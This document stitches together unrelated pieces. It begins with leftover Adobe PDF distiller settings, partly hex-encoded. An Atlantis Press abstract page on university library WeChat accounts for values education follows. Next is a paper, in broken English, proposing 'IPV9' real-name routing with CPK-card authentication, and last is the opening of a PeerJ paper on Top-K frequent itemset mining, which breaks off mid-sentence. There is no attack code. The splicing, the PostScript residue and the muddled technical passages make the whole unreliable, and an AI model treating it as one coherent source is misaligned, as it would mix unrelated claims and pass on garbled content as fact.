<FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_qzkjl64qufcnpbhh34cyn34ozu ---- University Library Internet WeChat Public Account Applicated for Student Values Education | Atlantis Press Proceedings Journals Books Series:Advances in Computer Science Research Proceedings of the 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) home preface articles authors sessions organizers publishing information <Previous Article In Volume Next Article In Volume> University Library Internet WeChat Public Account Applicated for Student Values Education Authors Zhao Yan Corresponding Author Zhao Yan Available Online April 2018. DOI https://doi.org/10.2991/icsnce-18.2018.41How to use a DOI? Keywords University Library; WeChat Public Account; Values Education Abstract With the popularization of intelligent mobile phones, mobile phones instant messaging application has achieved rapid development, at the same time, along with the SNS (Social Network Service) development, combined with mobile phones instant messaging and SNS has become an important means of the current Internet environment for people to communicate, in this trend, the university library is constantly looking for every kind of platform the expansion of information service. WeChat is a public platform for multimedia service platform Tencent Inc launched in the WeChat foundation, since August 2012 officially launched, quickly applied to restaurants, hotels, banks and other industries, and achieved good development, University library also actively use WeChat public platform, a new method to create the information service. In September 4, 2012, Beihang University opened a WeChat public platform, the first university library and university library, China also launched WeChat service platform, designed for teachers and students to provide more convenient and fast, and various information services, among them, China"985" universities, public service platform of WeChat has 30 colleges and universities the library opened the official certification, the "985" university libraries provide public service platform of WeChat earlier, in the function of the platform construction experience is relatively rich, ahead of other colleges and universities in china. Investigation and analysis of the public use of the WeChat, and on the construction of college students, some university libraries in Xi'an city to carry out the use of WeChat, the public number, in order to understand the Xi'an City University library with the WeChat platform opened the public service teaching situation through research, especially the university library using the WeChat public number of value education, to some experience through investigation of University library in this aspect, also hope to find some problems, and put forward the Countermeasures of university library with the educational values of college students network of new media services. Open Access This is an open access article distributed under the CC BY-NC license. Download article (PDF) <Previous Article In Volume Next Article In Volume> Proceedings 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) Part of series Advances in Computer Science Research Publication Date April 2018 ISBN 978-94-6252-498-9 ISSN 2352-538X DOI https://doi.org/10.2991/icsnce-18.2018.41How to use a DOI? Open Access This is an open access article distributed under the CC BY-NC license. Cite this article risenwbib TY - CONF AU - Zhao Yan PY - 2018/04 DA - 2018/04 TI - University Library Internet WeChat Public Account Applicated for Student Values Education BT - 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) PB - Atlantis Press SP - 208 EP - 212 SN - 2352-538X UR - https://doi.org/10.2991/icsnce-18.2018.41 DO - https://doi.org/10.2991/icsnce-18.2018.41 ID - Yan2018/04 ER - download .riscopy to clipboard Atlantis Press Atlantis Press is a professional publisher of scientific, technical and medical (STM) proceedings, journals and books. We offer world-class services, fast turnaround times and personalised communication. The proceedings and journals on our platform are Open Access and generate millions of downloads every month. For more information, please contact us at: contact@atlantis-press.com ProceedingsJournalsBooksPublishing services AboutNewsContactSearch Copyright © 2006-2021 Atlantis Press HomePrivacy PolicyTerms of use work_r2n6utxtgzbuvo5emvxy7yq5um ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-002 9 Research on Real-Name Routing and Trusted Connection Based on IPV9 and CPK-card Xie Jianping 1. Chinese Decimal Network Working Group, Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. Shanghai, China E-mail: 13386036170@189.cn Nan Xianghao 1. Chinese Decimal Network Working Group, Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. Shanghai, China E-mail: nanxh2001@163. com AliAbZoraghchin Department of Computer Engineering Allame Mohaddes Noori Institute of Higher Education Mazandaran, Iran E-mail: aliab@yahoo.com Abstract—Router is the basic component of the Internet. In this scheme, identification technology is used for the first time in router design to provide address authenticity proof to prevent illegal access. Provide proof of connection freshness to prevent reissue attacks; the first use of software identification technology, to provide the credibility of the router operating environment, to prevent Trojan and other malicious software intrusion. The design also provides densification function to ensure privacy. This is a key security requirement for the next generation of Internet protocols. This design method will be combined with the new addressing technology of geographical location addressing to construct the next generation of Internet routers. The technology is also used in the design of new switches in telecommunications networks. Keyword-IPV9; CPK-card; Real-Name Routing; Trusted Connection I. INTRODUCTION Routers work in the network layer of the OSI seven-layer protocol. Their main function is to connect the network with the network and forward packets between the networks. Routers have become the most important network equipment, so the research on the new generation of routers will become the core technology of the next generation of Internet research. Due to the IPv4, IPv6 protocols that used in the Internet, the new requirements for trusted Cyber Security connections are not met. The TCP/IP protocol has no security concerns, it does not provide address authentication, does not prevent unauthorized access, and does not protect against DOS attacks. At present, all kinds of malicious software and spam information are rampant on the Internet, which seriously pollutes the use environment of the Internet and directly affects the survival of the Internet. As a result, all countries over the world have developed a new generation of green Internet research. In 2008 the European Union's 65 scientific institutions jointly issued the brad declaration, calling for a new generation of the Internet. The European Union has raised 9.1 billion Euros to support future Internet research and development. The U.S governments have also successive proposed identity authentication and Addressing system as major scientific research tasks, and emphasized international cooperation. ISO, the international standards body, put forward its plan for the future network in 2007. In 2007, Chinese researchers Xie Jianping proposed the IPv9 geographical location addressing method, which solved the problem of combining IP address with geographical location. Later, South Korea also proposed the idea of geographical location addressing, and becoming the second country to propose a new method of addressing. CPK (Combined Public Key) identity authentication technology is mature and can be used in Internet protocol to realize trusted connection. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 10 So far, China had already had the technology foundation that research and development next generation router and future network protocol. II. REQUIREMENTS FOR TRUSTED CONNECTIONS In order to realize the trusted connection between routers and users, the user name (Pc1) and route address (Alfa) are identified for identity authentication. Among routers, mutual authentication is made with IP address as identity, and mutual authentication is made with user name as identity between users. Suppose that Pc1ID is the user name of a client and AlfaID is the IP address of a router. Assume that AlfaID="china- beijing-haidian-peking university" and BetaID="china- beijing-haidian-tsinghua university". Now assume the starting address is AlfaID and the destination address is BetaID, and the connection process is shown in figure 1 (dotted lines indicate that CPK-card is used and the original address is identified).. Figure 1. Data workflow diagram The IP packet of the original router passes through multiple routing routers and finally arrives at the destination router. Illegal access is easy to access in the intermediate routing router. It can be seen from the working principle of the above router that previous routers only pay attention to the routing of the next hop and do not care where the packet comes from. Therefore, if we do not solve the origin address verification, we cannot overcome the illegal access. Some people try to solve the problem of illegal access by means of encryption, but under the condition of public key system, this is futile. For example, Beta is the receiving party, and its public key is public, so anyone can encrypt Beta, so Beta still doesn't know who the sender is. In order to achieve the trusted connection, the router must meet the following four conditions: 1) The primary IP address must be given to send proof of address; it can be verified by any one place; 2) All routing routers verify the original address, and reject forward if there is any discrepancy; 3) It can prevent illegal access and resist DOS attacks. 4) The internal computing environment of the router is reliable. III. IPV9 CONNECTION ENVIRONMENT The connection policy is as follows. Path 1 (all using IPV9 protocol and CPK-card) 1) Pc1ID signs the data with pc1 and delivers the signed data to the router AlfaID. 2) AlfaID signs the time with alfa and forwards it to the next router, which verifies the signature of the original address. If the verification passes, the data is forwarded to the next router. 3) GamID, LamID, BetaID and other routing operations are the same as above. 4) The BetaID route forwards the data to the receiving user Pc2ID. Path 2 (Client adopts IPV9 protocol, but does not use CPK-card) : International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 11 1) Pc3ID does not use CPK-card but sends data to Pc4ID via routing AlfaID via PT converted to IPV9 protocol. 2) The AlfaID route obtains the packet source address as the public key and verifies the correctness of the source. Path 3 (The client does not use IPV9 protocol and CPK-card): 1) Pc3ID does not use CPK-card and USES IPV4/IPV6 protocol to route data to Pc4ID via AlfaID. 2) Route through the DeltaID and SigID routes to the BetaID route and forward the data to PC4ID. Path 4 (The client adopts IPV9 protocol and USES CPK-card, but the middle V9 route does not use CPK- card): 1) Pc1ID using the local address as the public key to sign the data and sends data to Pc2ID via route AlfaID. 2) The AlfaID route takes the source address of the packet as the public key and verifies the correctness of the source. After verification of the source address, remove the original signature and use the local address as the public key signature. After the signature, forward the normal routing data. 3) Instead of using CPK-card, GamID obtains the source address of the packet as the public key and verifies the correctness of the source. If the address is not legitimate, the data is discarded and the normal routing data is forwarded. 4) LamID, BetaID and other routing operations are the same as above. 5) The BetaID route forwards the data to the destination Pc2ID. The IPV9 v4/v6 compatible data forwarding process is shown in figure 2. Figure 2. Data forward process diagram IV. IPV9 AUTHENTICATION FUNCTION A. CPK-Card CPK is a public key-based cryptography system that takes the identity of any entity directly as the public key, while the private key is distributed in the form of ID-card. Now, for example PC1, ALFA (uppercase) and so on respectively represent their public keys, pc1, alfa (lowercase) and so on respectively represent their private keys. If it has been insert a CPK-card defined as AlfaID on any router, the router becomes the identified router as AlfaID. Similarly, any router inserts a CPK-card defined as BetaID, and the router becomes the identified router as BetaID. The router is configured with CPK-card, which has the functions of digital signature and key exchange. The contents of CPK-card are as follows: let the router's IP address be alfa (alfa may be the real name of China. Beijing. Haidian. Peking University etc. and it can be changed into machine executable code after the unified name translation). ID-card format and size is as table 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 12 B. Original address identification Suppose the original place is AlfaID, the next router is GammaID, AlfaID sends data, Mas1 AlfaID→GammaID:{Alfa, sign1, Beta, time data, checksum} Where, sign1 is the signature of the original AlfaID address, that is sign1= SIGalfa (time), BetaID is the destination address, SIG is the signature function, and alfa is the private key of the signature, provided by CPK-card. Where data is data from the application layer, data may be plaintext or ciphertext. The router's job is to pass the data to the next router. TABLE I. ID-CARD FORMAT AND SIZE 1 Z1: Validate parameter 16B EPWD(R1)=Z1 2 Z2: Validate parameter 16B ER1(R1) ⊕ R1=Z2 3 Identify definition 25B alfa 5 Private key 1 32B ER1(csk1)=Y1 6 Private key 2 32B ER1(csk2)=Y2 10 Issue unit 25B KMC 11 Signature of issue unit 48B SIGkmc （MAC） GammaID verifies the signature of original address: SIG -1ALFA(time )=sign1' Where SIG-1 is the validation function and ALFA is the public key. If sign1=sign1', allow this connection, forward Msg1, and audit. Identify replay attacks against time. V. IPV9 ENCRYPTION FUNCTION The structure of data is defined as follows: Data={Pc1ID,Pc2ID,data, mac}, Where Pc1ID is the sender and Pc2ID is the receiver. When the data is in plaintext: Data={ Pc1ID, Pc2ID, clear-text, mac}; When the data is in ciphertext: Data={Pc1ID, Pc2ID, coded-key, coded-data, mac}; If the encryption and decryption function is provided by the router, and Alfa encryption and Beta decryption are set, then data encryption can only be done in a non-online way. If the router is responsible for encryption and decryption, and this data is encrypted data, coded key and coded data need to be interpreted and a series of steps shall be performed: 1) Generate random number R, AlfaID calculation key: key=R × (G); where G is the base point of the elliptic curve; key will be used to encrypt the data; 2) 2) Calculate the sending key: R(BETA)=coded- key, where BETA is the public key of BetaID and coded-key is sent to BetaID. 3) 3) Encrypt data: Ekey (data) =cipher-text; Send ciphertext cipher=text and coded-key to BetaID. BetaID receives a signal from the AlfaID and automatically enters the decryption process.  BetaID computes the inverse of the private key: beta-1 ;  BetaID calculates the session key: beta- 1(coded-key)=key;  Data decryption：Dkey(cipher-text)= data. VI. IPV9 PACKET HEADER FORMAT AND ENCODING FORMAT A. Packet header format The new features require the development of a new IP header format that includes at least the original address, the start address identifier, the destination address, the data, and the checksum. Data encryption only affects the data format, not the IP packet header format. Version Category Flow label Payload Length Next Header Hop limit Source address Destination address time Identification code (signature) 40BYTE International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 13 B. IPV9 coding format The encoding format of IPV9 is shown in the following table 2. TABLE II. ENCODING FORMAT OF IPV9 segment 1 2 3 4 5 6 7 Head segment Address area Entity code Vendor code Product code Product class code Country code District code Year code Single product code 2 4 6 4bit 14bit 20bit 8bit 199bit 362300 3211 123345678912345 12345678912345678912 20090317 32564328 When the industrial standard "business RFID label data format" is adopted, the enterprise product coding data format is as follows: 1) The basic data format of enterprise products is as follows: 12345678912345-12345678912345678912- 20090317-32564328 2) When data exchange is used between management departments, the format of enterprise product data is: 3221-12345678912345-12345678912345678912- 20090317-32564328 3) When data is exchanged between regions and management departments, the format of enterprise product data is: 362300-3221-12345678912345- 12345678912345678912-20090317-32564328 4) When data are exchanged between countries: a) When exchanging with the itu-t E164 data system, the data format is: 00-8600-36230 － 3221-12345678912345- 12345678912345678912-20090317-32564328. b) When exchanging with ISO's object identifier data system, the data format is: 01-8600-362300 － 3221-12345678912345- 12345678912345678912-20090317-32564328. c) When exchanging with the object identifier data system of ISO/ITU, the data format is: 02-8600-362300 － 3221-12345678912345- 12345678912345678912-20090317-32564328. C. Enterprise product IPV9 address format 1) The basic IPV9 address format of enterprise products is: 12345678912345]12345678912345678912]200903 17]32564328. 2) When data exchange is used between management departments, the IPV9 format of enterprise product data is: 3221]12345678912345]12345678912345678912]2 0090317]32564328. 3) When data is exchanged between regions and management departments, the IPV9 format of enterprise product data is: 362300]3221]12345678912345]123456789123456 78912]20090317]32564328 4) When data are exchanged between countries, the IPV9 format is: a) When exchanging with the ITU-T, E164 data system, the IPV9 data format is: 00]8600]362300]3221]12345678912345]12345678 912345678912]20090317]32564328 b) When exchanging with ISO's object identifier data system, the IPV9 data format is: 01]8600]362300]3221]12345678912345]12345678 912345678912]20090317]32564328 c) When exchanging with the object identifier data system of ISO/ITU-T, the IPV9 data format is: 02]8600]362300]3221]12345678912345]12345678 912345678912]20090317]32564328 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 14 VII. IPV9 TRUSTED COMPUTING In order to ensure the credibility of the operation of the router, all the execution code in the router must be certified by the manufacturer (level 1 certification), that is, the manufacturer sign on the appearance of all the execution code. Each router has an authentication function (provided by CPK-card). A. Proof of software code The manufacturer has a CPK-card, which can carry out manufacturer signature on all system software in the router. Implementation software is divided into software identity (codeID) and software ontology (codeBD), which are signed by the manufacturer respectively: SIGmanufacturer (codeID) = sign1 SIGmanufacturer (codeBD)＝sign2 Where, SIG is the signature function, manufacturer is the private key of the manufacturer, codeID is the name of the executing code, and codeBD is the HASH value of the executing code ontology. Any executing code in the router has its own authentication codes, sign1 and sign2. B. Identification of software code The router inserts the CPK-card so that it has the CPK authentication function. There are two ways to verify the router: one is to uniformly verify when the router is turned on, and the code that fails to pass the verification is uniformly deleted to ensure that the router system returns to the original state; the other is that when software code is invoked, it is validated first and then executed. Verify sign1 and sign2 respectively: SIG -1 MANUFACTURER (codeID)=sign1’ SIG -1 MANUFACTURER (codeBD)=sign2’ Where MANUFACTURER is the public key, it is allowed execute if sign1=sign1'and sign2=sign2', otherwise it is rejected. In this way to ensure that the implementation of the router code is the manufacturer certification code, other code will not be executed, from the attack of viruses, Trojans. VIII. CONCLUSION The TCP/IP protocol does not guarantee trusted connections, so it must be modified. Based on geographical encoding and location addressing, three key techniques of trusted methods are proposed in this paper. Use address identification mechanism to prevent illegal connection; Adopt random Q&A mechanism to prevent replay attack; Software code can be identified by the mechanism, to prevent the intrusion of viruses, Trojans. The above design method is fully applicable to the trusted connection of the physical layer. There are two kinds of physical layer: one is the physical layer defined in the seven-layer information network protocol, and the platform supporting the information network is the application program interface (API). The second is the physical layer defined in the telecommunications network, and the platform supporting the telecommunications network is the telecommunications reference point (TRP). In the information network, if the network layer can guarantee the credibility of transmission, the security of the physical layer can be replaced by the network layer. However, the physical layer of the telecom network, without modification, cannot achieve trusted connection, cannot prevent illegal access. It is modified in exactly the same way as the router. REFERENCES [1] Tang Xiaodan etc. Computer Operating System (third edition) [M]. Xi’an: Xidian university press, 2010. [2] Nan Xiang-hao. CPK Combined Public Key System [J]. Information Security and Communication Confidentiality, 2013(03):39-41. [3] Xie Jianping etc. A method of assigning addresses to network computers using the full decimal algorithm [P]. CN: ZL00135182.6, 2004.2.6. [4] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [5] Nan Xianghao. CPK Public Key System and Identification Identification. [M]. Beijing: People's Posts and Telecommunications Press, 2013. [6] Xie Jianping, Xu Dongmei, etc. Digital domain name specification. SJ/T11271-2002, 2002.07. [7] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [8] Wang Wenfeng, Xie Jianping, etc. Product and service digital identification format for information procession. SJ/T11603-2016, 2016. 06. [9] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06 work_r3mmyvnufnawhgtys6o7f7z7lq ---- Submitted 16 December 2020 Accepted 16 January 2021 Published 8 March 2021 Corresponding author Lisu Yu, lisuyu@ncu.edu.cn Academic editor Muhammad Asif Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.385 Copyright 2021 Iqbal et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS TKFIM: Top-K frequent itemset mining technique based on equivalence classes Saood Iqbal1, Abdul Shahid1, Muhammad Roman1, Zahid Khan2, Shaha Al-Otaibi3 and Lisu Yu4,5 1 Institute of Computing, Kohat University of Science & Technology, Kohat, Kohat, KPK, Pakistan 2 Robotics and Internet of Things Lab, Prince Sultan University, Riyadh, Saudi Arabia 3 Information Systems Department, College of Computer and Information Sciences, Princess Nourah Bint Abdulrahman University, Riyadh, Saudi Arabia 4 School of Information Engineering, Nanchang University, Jiangxi, China 5 State Key Laboratory of Computer Architecture, Institute of Computing Technology, Chinese Academy of Sciences, Beijing, China ABSTRACT Frequently used items mining is a significant subject of data mining studies. In the last ten years, due to innovative development, the quantity of data has grown exponentially. For frequent Itemset (FIs) mining applications, it imposes new chal- lenges. Misconceived information may be found in recent algorithms, including both threshold and size based algorithms. Threshold value plays a central role in generating frequent itemsets from the given dataset. Selecting a support threshold value is very complicated for those unaware of the dataset’s characteristics. The performance of algorithms for finding FIs without the support threshold is, however, deficient due to heavy computation. Therefore, we have proposed a method to discover FIs without the support threshold, called Top-k frequent itemsets mining (TKFIM). It uses class equivalence and set-theory concepts for mining FIs. The proposed procedure does not miss any FIs; thus, accurate frequent patterns are mined. Furthermore, the results are compared with state-of-the-art techniques such as Top-k miner and Build Once and Mine Once (BOMO). It is found that the proposed TKFIM has outperformed the results of these approaches in terms of execution and performance, achieving 92.70, 35.87, 28.53, and 81.27 percent gain on Top-k miner using Chess, Mushroom, and Connect and T1014D100K datasets, respectively. Similarly, it has achieved a performance gain of 97.14, 100, 78.10, 99.70 percent on BOMO using Chess, Mushroom, Connect, and T1014D100K datasets, respectively. Therefore, it is argued that the proposed procedure may be adopted on a large dataset for better performance. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Frequent Itemsets, Support Threshold, Algorithm Analysis, Top-k Frequent Itemsets, Artifical Intelligence INTRODUCTION Finding FIs is one of the leading research problems used in many critical data mining tasks like classification (Nguyen et al., 2012), clustering (Wang et al., 2002), sequential patterns (Fournier-Viger et al., 2017), and association rule mining (ARM) (Agrawal, Imielinski & Swami, 1993). Besides this, other various applications such as multitask How to cite this article Iqbal S, Shahid A, Roman M, Khan Z, Al-Otaibi S, Yu L. 2021. TKFIM: Top-K frequent itemset mining tech- nique based on equivalence classes. PeerJ Comput. Sci. 7:e385 http://doi.org/10.7717/peerj-cs.385 https://peerj.com/computer-science mailto:lisuyu@ncu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.385 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.385 based association rule mining (Taser, Birant & Birant, 2020), high utility pattern mining (Krishnamoorthy, 2019), Top-k pattern mining (Nguyen et al., 2018), and frequent weighted mining (Nam et al., 2020b). FIs mining methods find the set of items that frequently occurs in a given set of transactions. It shows the association rules which define how an itemset in a transaction dataset depends on another itemset’s behavior. The first algorithm used for computing and finding association among FIs is known as Apriori (Agrawal, Imielinski & Swami, 1993; Agrawal & Srikant, 1994). The Apriori algorithm generates a large number of candidate itemset. It also performs multiple scanning of the transaction table for finding frequent itemsets that result in overhead on input and output devices. For large database systems, the I/O overhead becomes more demanding for large memory for storing the data. Later on, Zaki & Gouda (2003) proposed the dEclat, a diffset algorithm. It employs a vertical representation of the database. The fundamental concept of a diffset algorithm is that a particular set of transaction IDs (tidsets) can be used to measure the support of itemsets. The main serious demerit of the Eclat approach is the size of tidsets, which affect the processing time and are costly to store in memory. Another algorithm that influenced most of the work in this area is Frequent Pattern (FP) growth (Han, Pei & Yin, 2000). The FP-Growth method performs at least two scans. First, process frequent patterns of length-1 and count their support value. Afterward, the items are sorted in decreasing order of their support. These methods are referred to as conventional methods. The conventional FIs methods are based on the minimum support threshold (Fournier- Viger et al., 2017; Agrawal & Srikant, 1994). In a transaction table, the minimum supported value, also known as minsup, specifies the minimum frequency of an element in a collection. All the itemsets whose frequency exceeds or is equal to the threshold value are known as FIs. However, it is a difficult task to find a reasonable value for a threshold. For example, if the threshold value is maintained too low, too many FIs can be created, and the necessary patterns can hardly be found among the massive collection of produced patterns. Similarly, if the threshold value is set too high, it will generate too few FIs, in which we may miss some crucial patterns in the transaction table. The selection of the threshold value also affects the field of the search and the resulting space (Huynh-Thi-Le et al., 2015). Thus another set of methods emerges; they are referred to as Top-k procedures. It is the procedure to find out itemsets of highest support to the k support among all the existing FIs. It refers to the user’s choice of frequent itemsets 